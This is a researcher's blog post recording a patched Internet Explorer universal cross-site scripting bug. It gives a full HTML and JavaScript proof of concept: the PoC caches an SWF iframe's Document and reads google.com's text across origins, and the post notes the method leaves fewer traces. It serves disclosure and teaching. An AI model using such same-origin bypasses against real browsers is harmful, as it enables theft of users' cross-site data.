UXSS Simplification (WOOBR 977211): Cached SWF Document Without Reload

Earlier UXSS variants using cached iframe documents required reloading the main page and using window.opener as the storage mechanism. I was looking for a simpler version and found one: by caching the Document object of an SWF-loaded iframe directly in a local variable (no opener, no reload), then navigating the iframe to about:blank and redirecting the cached document’s parentWindow to a target URL, I could read that page’s content. The approach is more direct and harder to detect because it leaves fewer observable side effects.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xDom_Variation_Simplification_WOOBR_977211</title></head>
<body>
<font face="Tahoma" size="2">
<center><h2>xDom_Variation_Simplification_WOOBR_977211</h2></center>
<center>
<input type="button" value="Do It!" onclick="loadItTwice()"><br />
(And wait 5 seconds because we have to load the swf inside the IFRAME, cache it's <b>D</b>ocument, change the URL to Google, wait, and read its body.innerText. <br /><br />
This version is much simpler because it does not use the opener and there's no reloading of the main page.<br /><br />
<font color="red">If you receive an error, just ignore it. It's the focus() that Google does to its INPUT, but because it's hidden, IE throws an error.</font>
</center>
<hr />
1) Load any <font color="blue"><b>swf</b></font> inside an IFRAME.<br />

<font color="red">window[0]</font>.location.replace('<font color="blue">empty.swf</font>');<br /><br />

2) Cache the <font color="blue"><b>D</b></font>ocument of the IFRAME in the <b>cachedDocument</b> variable.<br />
<font color="blue">cachedDocument</font> = document.all.flashContainer.<font color="blue"><b>D</b></font>ocument;<br /><br />
3) Change the URL of the IFRAME.<br />
window[0].location = "<font color="blue">about:blank</font>";<br /><br />

4) Change location of the cached <font color="blue"><b>D</b></font>ocument to the desired URL/Domain.<br />
<font color="blue"><b>cachedDocument</b>.parentWindow.location</font> = 'http://www.google.com';<br /><br />

5) Read the cached <font color="blue"><b>D</b></font>ocument at will.<br />
alert(<font color="blue"><b>cachedDocument</b>.body.innerText</font>);<br /><br />

<hr />
<br />
<center>
	<iframe id="flashContainer" width="100" height="100"></iframe>
</center>
</font>


<script language="JavaScript">
var cachedDocument;
function loadItTwice()
{
	window[0].location.replace('empty.swf');

	setTimeout('cachedDocument = document.all.flashContainer.Document; window[0].location = "about:blank";', 500);

	setTimeout('cachedDocument.parentWindow.location = "http://www.google.com";', 1000);

	setTimeout('alert("This is the innerText of Google:\\n\\n" + cachedDocument.body.innerText)', 5000);
}
</script>
</body>
</html>

This variation distills the UXSS technique to its minimum. The Document of an SWF-loaded iframe is cached into a local variable before the iframe is navigated away. Pointing cachedDocument.parentWindow.location to any target URL causes that URL to load in the ghost iframe context, but since the cachedDocument reference bypasses the same-origin check (it was acquired before the navigation), reading cachedDocument.body.innerText five seconds later returns the full text of the target page. No page reload and no window.opener manipulation are needed — just a single local variable holding a stale document reference.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Vista RCE via XAML Frame + ExecWB PrintPreview] :: [PDF Plugin: Loading Local Files via file:// Protocol Link] >